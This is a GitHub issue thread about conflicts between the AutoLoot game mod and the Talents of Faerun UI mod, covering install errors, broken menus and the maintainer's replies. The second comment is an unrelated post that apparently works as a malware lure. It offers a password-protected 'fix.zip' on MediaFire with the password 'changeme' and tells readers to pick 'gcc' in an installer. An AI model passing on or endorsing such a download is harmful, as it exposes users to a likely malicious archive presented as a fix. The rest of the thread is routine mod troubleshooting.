### ISSUE TITLE
Compatibility with Talents of Faerun

### ISSUE THREAD

**Issue by MazConelly** [LCA-EET/AutoLoot#1]
Just as a note, the mod in its current state doesn't play well with [Talents of Faerun](https://www.gibberlings3.net/files/file/1041-talents-of-faer%C3%BBn/), as it does a lot of UI modifications. If AutoLoot is installed before, the install of some of ToF's kits will error out. If installed after, the UI.MENU won't work correctly, with some menus like the proficiency/skill menu not working properly.
Still, that's just one mod and it's already known to not play well with other UI changes without dedicated compatibility work.

All the same, good job on refurbishing Bubb's mod!

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LCA-EET** [comment]
Take a look at v1.2. I didn't test it against Talents of Faerun, but it works with InfinityUI now, so maybe it will work for the other mod.

**Comment by MazConelly** [comment]
Hmm, I don't use Infinity, too many conflicts with other mods, and I don't have a ToF install available for now.
Still, in case it helps, I tried to install it on top of a install I have with LeUI (basically vanilla +) and SCS, but the icon you mention in the other issue thread isn't there.
Made a test install with only EEex just to check; no button in the gameplay options screen, but it is in the game screen, floating around the top left corner. Tried with LeUI alone, same with the icon, but the menu is all jumbled.

**Comment by LCA-EET** [comment]
Yeah I scrapped the idea of including the AutoLoot menu in the gameplay menu when it became apparent that mods sometimes edit the gameplay menu as well. When you say the menu is jumbled, you're referring to the AutoLoot menu, or something else?

Thanks

Get Outlook for Android<https://aka.ms/AAb9ysg>
________________________________
